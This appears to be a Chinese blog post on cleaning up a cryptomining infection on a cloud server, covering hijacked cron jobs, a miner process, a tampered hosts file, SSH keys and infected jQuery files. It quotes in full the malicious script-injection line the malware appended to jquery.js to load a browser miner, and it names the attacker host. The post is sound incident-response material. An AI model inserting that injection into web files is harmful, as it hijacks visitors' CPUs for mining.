服务器又又被挖矿了。。。
top 看了一下,有个 cncq 的进程把 CPU 跑满了。直接上解决过程。
初步分析
crontab -e 查看定时任务,发现定时任务已被篡改。有两项是定时下载并执行 shell 命令。
wget 将 两个 sh 文件下载,后续进行分析。
屏蔽 IP
通过分析定时任务,发现会定时下载并执行 shell 命令,为防止重复执行,先将对方 ip 进行屏蔽。
ping http://w.3ei.xyz 得出对方 ip 为 111.62.24.216
服务器为阿里云服务器,直接通过阿里云的安全组屏蔽出网ip。
删除定时任务
crontab -e 编辑删除所有定时任务。发现提示我无权限,已用 root 用户。
使用 lsattr /var/spool/cron/root 查看sia属性
chattr -isa /var/spool/cron/root 去除 sia 属性
crontab -e 编辑删除所有定时任务
kill 进程
top 查看 cncq 进程 id
ll /proc/[进程 id] 查看进程目录
exe -> /etc/cncq 为进程的执行目录
rm -rf /etc/cncq
kill - 9 [进程 id]
删除文件
通过分析下载的 shell 脚本,删除以下文件:
rm /tmp/crloger1
rm /tmp/v2
rm /etc/cncq
rm /var/spool/cron/crontabs/root
``
在删除文件时,发现 rm 命令没有了。查看了/bin 下,rm 被删除了。从别的服务器上 copy 了一个rm 文件,设置权限,就可以了。
/etc下文件修复
在 /etc 下,查看文件修改时间,发现有若干文件添加和被修改,有部分文件无用,直接删除即可。
vim /etc/hosts 发现一堆域名指向,看了一下,是什么门罗币。被挖矿确认无疑。修改为以下内容即可。
127.0.0.1 localhost localhost.localdomain
::1 localhost localhost.localdomain
清空文件 /etc/cron.d/root
删除可疑authorized_keys
vim .ssh/authorized_keys
查看是否有可疑key ,删除,如遇权限问题 chattr 命令解决。
修复 js 文件
通过脚本分析,对方会在所有查找所有jquery.js文件,并在文件中添加内容:
'\document.write\('\'\<script\ src=\"http://t.cn/EvlonFh\"\>\</script\>\<script\>OMINEId\(\"e02cf4ce91284dab9bc3fc4cc2a65e28\",\"-1\"\)\</script\>\'\)\;
会导至所有web访问者的电脑cpu跑满,无法使用服务。
反其道:
find / -name 'jquery*.js'|xargs grep -L f4ce9|xargs sed -i '/e02cf4ce91284dab9bc3fc4cc2a65e28/d'
删除所有 jquery.js 中带e02cf4ce91284dab9bc3fc4cc2a65e28 的行。
最后,在此清明佳节之时,祝 w.3ei.xyz 所有者,清明快乐。
网友评论